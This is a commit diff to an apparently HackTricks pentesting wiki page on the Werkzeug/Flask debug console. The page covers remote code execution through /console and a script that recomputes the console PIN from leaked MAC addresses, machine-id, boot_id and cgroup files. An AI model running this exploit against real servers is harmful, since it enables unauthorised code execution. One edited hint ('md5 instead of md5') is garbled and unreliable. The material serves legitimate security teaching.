GITBOOK-3841: change request with no subject merged in GitBook

2024-11-22 04:33:28 +00:00 · 2023-03-28 21:30:40 +00:00 · 2023-03-28 21:30:40 +00:00 · 54b48259f0
commit 54b48259f0
parent 4e9432ed74
2 changed files with 85 additions and 41 deletions
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -366,7 +366,7 @@
  * [WAF Bypass](network-services-pentesting/pentesting-web/waf-bypass.md)
  * [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md)
  * [WebDav](network-services-pentesting/pentesting-web/put-method-webdav.md)
-  * [werkzeug](network-services-pentesting/pentesting-web/werkzeug.md)
+  * [Werkzeug / Flask Debug](network-services-pentesting/pentesting-web/werkzeug.md)
  * [Wordpress](network-services-pentesting/pentesting-web/wordpress.md)
  * [XSS to RCE Electron Desktop Apps](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md)
    * [Electron contextIsolation RCE via preload code](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md)
--- a/network-services-pentesting/pentesting-web/werkzeug.md
+++ b/network-services-pentesting/pentesting-web/werkzeug.md
@ -1,23 +1,18 @@
-
+# Werkzeug / Flask Debug

 <details>

-<summary><strong>HackTricks in </strong><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>

-
-# Console RCE
+## Console RCE

 If debug is active you could try to access to `/console` and gain RCE.

@ -29,14 +24,14 @@ __import__('os').popen('whoami').read();

 There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.

-# Pin Protected
+## Pin Protected

 In some occasions the /console endpoint is going to be protected by a pin. Here you can find how to generate this pin:

 * [https://www.daehee.com/werkzeug-console-pin-exploit/](https://www.daehee.com/werkzeug-console-pin-exploit/)
 * [https://ctftime.org/writeup/17955](https://ctftime.org/writeup/17955)

-## Werkzeug Console PIN Exploit
+### Werkzeug Console PIN Exploit

 **Copied from the first link.**\
 See Werkzeug “console locked” message by forcing debug error page in the app.
@ -49,7 +44,7 @@ shell that runs the server

 Locate vulnerable Werkzeug debug console at path `vulnerable-site.com/console`, but is locked by secret PIN number.

-You can reverse the algorithm generating the console PIN. Inspect Werkzeug’s debug `__init__.py` file on server e.g. `python3.5/site-packages/werkzeug/debug/__init__.py`. View [Werkzeug source code repo](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\__init\_\_.py), but better to leak source code through file traversal vulnerability since versions likely differ.
+You can reverse the algorithm generating the console PIN. Inspect Werkzeug’s debug `__init__.py` file on server e.g. `python3.5/site-packages/werkzeug/debug/__init__.py`. View [Werkzeug source code repo](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py), but better to leak source code through file traversal vulnerability since versions likely differ.

 In this file, see relevant method outlining steps to generate console PIN:

@ -147,22 +142,74 @@ private_bits = [
 ]
 ```

-* `username` is the user who started this Flask
-* `modname` is flask.app
-* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is Flask
-* `getattr(mod, '__file__', None)` is the absolute path of `app.py` in the flask directory (e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). If `app.py` doesn't work, try `app.pyc`
-* `uuid.getnode()` is the MAC address of the current computer, `str (uuid.getnode ())` is the decimal expression of the mac address
-* `get_machine_id()` read the value in `/etc/machine-id` or `/proc/sys/kernel/random/boot_id` and return directly if there is, sometimes it might be required to append a piece of information within `/proc/self/cgroup` that you find at the end of the first line (after the third slash)
+#### **`probably_public_bits`**

-To find server MAC address, need to know which network interface is being used to serve the app (e.g. `ens3`). If unknown, leak `/proc/net/arp` for device ID and then leak MAC address at `/sys/class/net/<device id>/address`.
+* **`username`** is the user who started this Flask
+* **`modname`** is flask.app
+* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is **Flask**
+* `getattr(mod, '__file__', None)` is the **absolute path of `app.py`** in the flask directory (e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). If `app.py` doesn't work, **try `app.pyc`**

-Convert from hex address to decimal representation by running in python e.g.:
+#### `private_bits`
+
+*   `uuid.getnode()` is the **MAC address of the current computer**, `str(uuid.getnode())` is the decimal expression of the mac address.
+
+    *   To **find server MAC address**, need to know which **network interface is being used** to serve the app (e.g. `ens3`). If unknown, **leak `/proc/net/arp`** for device ID and then **leak** MAC address at **`/sys/class/net/<device id>/address`**.
+
+
+
+    Convert **from hex address to decimal** representation by running in python e.g.:
+
+    ```python
+    # It was 56:00:02:7a:23:ac
+    >>> print(0x5600027a23ac)
+    94558041547692
+    ```
+* `get_machine_id()` concatenate the **values in `/etc/machine-id` ** , **`/proc/sys/kernel/random/boot_id`** and **first line of `/proc/self/cgroup`** after the last slash (`/`).
+
+<details>
+
+<summary>get_machine_id() code</summary>

 ```python
->>> print(0x5600027a23ac)
-94558041547692
+def get_machine_id() -> t.Optional[t.Union[str, bytes]]:                                                                                                  
+    global _machine_id
+
+    if _machine_id is not None:
+        return _machine_id
+
+    def _generate() -> t.Optional[t.Union[str, bytes]]:
+        linux = b""
+
+        # machine-id is stable across boots, boot_id is not.
+        for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id": 
+            try:
+                with open(filename, "rb") as f:
+                    value = f.readline().strip()
+            except OSError:
+                continue
+
+            if value:
+                linux += value
+                break
+
+        # Containers share the same machine id, add some cgroup
+        # information. This is used outside containers too but should be
+        # relatively stable across boots.
+        try:
+            with open("/proc/self/cgroup", "rb") as f:
+                linux += f.readline().strip().rpartition(b"/")[2]
+        except OSError:
+            pass
+
+        if linux:
+            return linux
+
+        # On OS X, use ioreg to get the computer's serial number.
+        try:
 ```

+</details>
+
 Once all variables prepared, run exploit script to generate Werkzeug console PIN:

 ```python
@ -180,7 +227,8 @@ private_bits = [
    'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
 ]

-h = hashlib.md5()
+#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
+h = hashlib.sha1()
 for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
@ -210,22 +258,18 @@ if rv is None:
 print(rv)
 ```

-If you are on a new version of Werkzeug, try changing the hashing algorithm to sha1 instead of md5.
+{% hint style="success" %}
+If you are on an **old version** of Werkzeug, try changing the **hashing algorithm to md5** instead of md5.
+{% endhint %}

 <details>

-<summary><strong>HackTricks in </strong><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>
-
-